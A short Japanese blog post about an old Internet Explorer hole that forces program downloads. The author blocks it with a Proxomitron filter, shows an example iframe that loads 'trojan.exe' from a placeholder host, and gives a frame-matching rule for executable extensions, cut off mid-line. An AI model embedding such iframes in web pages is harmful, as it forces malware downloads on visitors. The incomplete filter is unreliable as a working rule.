件のIEのセキュリティホールは当座はProxomitronで防ぐことにする。

• ITPro ニュース:IEに危険なセキュリティ・ホール，スクリプトを無効にしても攻撃を受ける
• スラッシュドット ジャパン | ブラクラ状態の後にダウンロードプログラムを強制実行するIE 6

鑑定人関係で引っ掛かった人居そうで怖いな。
で、Proxomitron-Jに載ってるフィルタだと

<iframe src="http://example.com/trojan.exe">

が置換されない。

[Patterns]
Name = "Frame Flood Killer (2003/05/19)"
Active = TRUE
Bounds = "<(i|)frame*>"
Limit = 500
Match = "*src=($AV(*.(exe|com|doc|xls|pif|reg|scr|vbs)))\1*"
Replace = "